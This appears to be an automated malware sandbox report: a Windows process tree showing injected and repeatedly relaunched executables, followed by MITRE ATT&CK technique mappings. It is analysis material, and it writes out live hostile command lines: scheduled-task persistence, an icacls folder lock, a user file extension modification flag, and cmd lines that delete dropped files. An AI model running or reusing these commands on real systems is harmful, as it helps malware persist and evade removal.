                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          2⤵
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:5556
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            3⤵
                                                                                                                              PID:5268
                                                                                                                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                            2⤵
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:4760
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                            2⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:3612
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              3⤵
                                                                                                                                PID:5724
                                                                                                                            • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                              2⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:4212
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:4400
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                3⤵
                                                                                                                                  PID:3568
                                                                                                                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                2⤵
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                PID:4488
                                                                                                                              • C:\Users\Admin\AppData\Roaming\djiacuc
                                                                                                                                C:\Users\Admin\AppData\Roaming\djiacuc
                                                                                                                                2⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:5236
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:4528
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:3912
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                  2⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  PID:936
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:1900
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                    3⤵
                                                                                                                                      PID:2468
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                    2⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:4812
                                                                                                                                  • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:5636
                                                                                                                                    • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                                                      3⤵
                                                                                                                                        PID:2116
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:5852
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                        3⤵
                                                                                                                                          PID:5576
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                        2⤵
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:2076
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:5212
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                          3⤵
                                                                                                                                            PID:5836
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                          2⤵
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          PID:484
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:3404
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                            3⤵
                                                                                                                                              PID:5768
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                            2⤵
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:4340
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                            2⤵
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            PID:4348
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                              3⤵
                                                                                                                                                PID:504
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                              2⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:5240
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:5464
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                3⤵
                                                                                                                                                  PID:4880
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                2⤵
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                PID:4368
                                                                                                                                              • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                                                                2⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:5420
                                                                                                                                                • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4220
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                  2⤵
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:5892
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2772
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:5712
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                    2⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:4576
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                      3⤵
                                                                                                                                                        PID:984
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:3428
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:1748
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1328
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:3452
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                        2⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:2372
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4388
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\djiacuc
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\djiacuc
                                                                                                                                                          2⤵
                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          PID:4808
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          PID:4824
                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:996
                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                          1⤵
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:416
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                            2⤵
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:3352
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                            2⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:2280
                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                          1⤵
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:3868
                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:2200
                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                          1⤵
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          PID:5432
                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5460
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\66D4.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\66D4.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5444
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\66D4.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\66D4.exe
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                PID:1420
                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                  PID:5876
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\66D4.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\66D4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:5148
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\66D4.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\66D4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies extensions of user files
                                                                                                                                                                    PID:5856
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build2.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build2.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:4968
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build2.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build2.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        PID:6124
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:6092
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im build2.exe /f
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:5460
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout /t 6
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:1328
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build3.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build3.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:5632
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build3.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\930c94a5-66fe-4d4f-920b-0463fe3c1577\build3.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:1564
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:4196
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6DF9.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6DF9.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5776
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\978B.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\978B.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:5952
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0eCng7d3O8.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\0eCng7d3O8.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2144
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:6000
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\978B.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5720
                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:4456
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kZ0OiWMgFL.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\kZ0OiWMgFL.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5040
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          PID:5840
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9E91.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9E91.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:6044
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9E91.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9E91.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5436
                                                                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4196
                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5036
                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                          PID:2768
                                                                                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4588
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2200
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5692
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4408
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5780

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                Execution

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                Persistence

                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                1
                                                                                                                                                                                T1031

                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                1
                                                                                                                                                                                T1060

                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                1
